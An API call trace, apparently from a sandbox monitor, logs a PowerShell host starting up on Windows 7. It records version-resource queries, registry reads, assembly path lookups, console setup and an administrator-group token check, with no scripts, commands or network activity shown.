	[0507.478] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x22da58, puLen=0x22da50 | out: lplpBuffer=0x22da58*=0x2b1a3b0, puLen=0x22da50) returned 1
	[0507.478] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0507.478] CoTaskMemAlloc (cb=0x44) returned 0x3c4550
	[0507.478] lstrcpyW (in: lpString1=0x3c4550, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0507.478] CoTaskMemFree (pv=0x3c4550) 
	[0507.478] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x22da58, puLen=0x22da50 | out: lplpBuffer=0x22da58*=0x2b1a418, puLen=0x22da50) returned 1
	[0507.478] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0507.478] CoTaskMemAlloc (cb=0x76) returned 0x3616a0
	[0507.478] lstrcpyW (in: lpString1=0x3616a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0507.478] CoTaskMemFree (pv=0x3616a0) 
	[0507.478] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x22da58, puLen=0x22da50 | out: lplpBuffer=0x22da58*=0x2b1a4b4, puLen=0x22da50) returned 1
	[0507.478] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0507.479] CoTaskMemAlloc (cb=0x44) returned 0x3c4550
	[0507.479] lstrcpyW (in: lpString1=0x3c4550, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0507.479] CoTaskMemFree (pv=0x3c4550) 
	[0507.479] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x22da58, puLen=0x22da50 | out: lplpBuffer=0x22da58*=0x2b1a518, puLen=0x22da50) returned 1
	[0507.479] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0507.479] CoTaskMemAlloc (cb=0x58) returned 0x347400
	[0507.479] lstrcpyW (in: lpString1=0x347400, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0507.479] CoTaskMemFree (pv=0x347400) 
	[0507.479] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x22da58, puLen=0x22da50 | out: lplpBuffer=0x22da58*=0x2b1a594, puLen=0x22da50) returned 1
	[0507.479] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0507.479] CoTaskMemAlloc (cb=0x20) returned 0x3541c0
	[0507.479] lstrcpyW (in: lpString1=0x3541c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0507.479] CoTaskMemFree (pv=0x3541c0) 
	[0507.479] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x22da58, puLen=0x22da50 | out: lplpBuffer=0x22da58*=0x2b1a23c, puLen=0x22da50) returned 1
	[0507.479] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0507.479] CoTaskMemAlloc (cb=0x66) returned 0x3c08c0
	[0507.479] lstrcpyW (in: lpString1=0x3c08c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0507.480] CoTaskMemFree (pv=0x3c08c0) 
	[0507.480] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x22da58, puLen=0x22da50 | out: lplpBuffer=0x22da58*=0x0, puLen=0x22da50) returned 0
	[0507.480] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x22da58, puLen=0x22da50 | out: lplpBuffer=0x22da58*=0x0, puLen=0x22da50) returned 0
	[0507.480] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x22da58, puLen=0x22da50 | out: lplpBuffer=0x22da58*=0x0, puLen=0x22da50) returned 0
	[0507.480] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22da28, puLen=0x22da20 | out: lplpBuffer=0x22da28*=0x2b1a1e4, puLen=0x22da20) returned 1
	[0507.480] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0507.480] VerLanguageNameW (in: wLang=0x0, szLang=0x368dd0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0507.480] CoTaskMemFree (pv=0x368dd0) 
	[0507.480] VerQueryValueW (in: pBlock=0x2b1a148, lpSubBlock="\\", lplpBuffer=0x22da78, puLen=0x22da70 | out: lplpBuffer=0x22da78*=0x2b1a170, puLen=0x22da70) returned 1
	[0507.492] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0507.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.492] CoTaskMemFree (pv=0x38e630) 
	[0507.497] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0507.498] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.498] CoTaskMemFree (pv=0x38e630) 
	[0507.502] lstrlenW (lpString="䅁") returned 1
	[0508.089] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d948 | out: phkResult=0x22d948*=0x1bc) returned 0x0
	[0508.091] RegOpenKeyExW (in: hKey=0x1bc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d938 | out: phkResult=0x22d938*=0x1c4) returned 0x0
	[0508.091] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d9c8 | out: phkResult=0x22d9c8*=0x1c0) returned 0x0
	[0508.095] RegQueryValueExW (in: hKey=0x1c0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d90c, lpData=0x0, lpcbData=0x22d908*=0x0 | out: lpType=0x22d90c*=0x1, lpData=0x0, lpcbData=0x22d908*=0x56) returned 0x0
	[0508.096] CoTaskMemAlloc (cb=0x5a) returned 0x3c0850
	[0508.096] RegQueryValueExW (in: hKey=0x1c0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d8dc, lpData=0x3c0850, lpcbData=0x22d8d8*=0x56 | out: lpType=0x22d8dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d8d8*=0x56) returned 0x0
	[0508.097] CoTaskMemFree (pv=0x3c0850) 
	[0508.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0508.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0508.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0508.128] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0508.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.128] CoTaskMemFree (pv=0x38e630) 
	[0510.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0510.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0512.196] CoTaskMemAlloc (cb=0x104) returned 0x38e740
	[0512.196] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.196] CoTaskMemFree (pv=0x38e740) 
	[0512.197] CoTaskMemAlloc (cb=0x104) returned 0x38e740
	[0512.197] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.197] CoTaskMemFree (pv=0x38e740) 
	[0512.842] CoTaskMemAlloc (cb=0x104) returned 0x38e740
	[0512.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.842] CoTaskMemFree (pv=0x38e740) 
	[0512.844] CoTaskMemAlloc (cb=0x104) returned 0x38e740
	[0512.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.844] CoTaskMemFree (pv=0x38e740) 
	[0512.844] CoTaskMemAlloc (cb=0x104) returned 0x38e740
	[0512.844] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.844] CoTaskMemFree (pv=0x38e740) 
	[0517.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0517.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0519.145] CoTaskMemAlloc (cb=0x104) returned 0x38e740
	[0519.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0519.145] CoTaskMemFree (pv=0x38e740) 
	[0519.147] CoTaskMemAlloc (cb=0x104) returned 0x38e740
	[0519.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0519.147] CoTaskMemFree (pv=0x38e740) 
	[0521.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0521.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0528.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0528.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0529.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0529.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0532.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0532.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0535.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0535.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0535.144] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0535.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0535.144] CoTaskMemFree (pv=0x38e960) 
	[0536.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0536.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0536.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0536.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0537.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x22d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0537.169] SetErrorMode (uMode=0x1) returned 0x1
	[0537.169] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x22d8a0 | out: lpFileInformation=0x22d8a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0537.169] SetErrorMode (uMode=0x1) returned 0x1
	[0542.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0542.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0542.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0542.316] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0542.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0542.317] CoTaskMemFree (pv=0x38e960) 
	[0542.320] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0542.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0542.320] CoTaskMemFree (pv=0x38e960) 
	[0542.320] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0542.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0542.320] CoTaskMemFree (pv=0x38e960) 
	[0543.185] CoCreateGuid (in: pguid=0x22dc68 | out: pguid=0x22dc68*(Data1=0x443e9e88, Data2=0x7c32, Data3=0x46eb, Data4=([0]=0x90, [1]=0x9d, [2]=0xab, [3]=0xd0, [4]=0xd8, [5]=0xfd, [6]=0x55, [7]=0xc))) returned 0x0
	[0543.188] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0543.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.188] CoTaskMemFree (pv=0x38e960) 
	[0543.191] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0543.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.191] CoTaskMemFree (pv=0x38e960) 
	[0543.194] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0543.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0543.194] CoTaskMemFree (pv=0x38e960) 
	[0543.201] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0543.203] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x22d910 | out: lpConsoleScreenBufferInfo=0x22d910) returned 1
	[0543.209] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0543.210] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x22d910 | out: lpConsoleScreenBufferInfo=0x22d910) returned 1
	[0543.213] GetCurrentProcess () returned 0xffffffffffffffff
	[0543.214] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x22d938 | out: TokenHandle=0x22d938*=0x314) returned 1
	[0543.216] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22d858 | out: TokenInformation=0x0, ReturnLength=0x22d858) returned 0
	[0543.217] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3272e0
	[0543.217] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x3272e0, TokenInformationLength=0x4, ReturnLength=0x22d858 | out: TokenInformation=0x3272e0, ReturnLength=0x22d858) returned 1
	[0543.219] DuplicateTokenEx (in: hExistingToken=0x314, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x22d9b8 | out: phNewToken=0x22d9b8*=0x2d8) returned 1
	[0543.219] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22d858 | out: TokenInformation=0x0, ReturnLength=0x22d858) returned 0
	[0543.219] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x327290
	[0543.219] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x327290, TokenInformationLength=0x4, ReturnLength=0x22d858 | out: TokenInformation=0x327290, ReturnLength=0x22d858) returned 1
	[0543.220] CheckTokenMembership (in: TokenHandle=0x2d8, SidToCheck=0x2bf4ef0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x22d9c8 | out: IsMember=0x22d9c8) returned 1
	[0543.220] CloseHandle (hObject=0x2d8) returned 1
	[0543.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0543.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0543.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
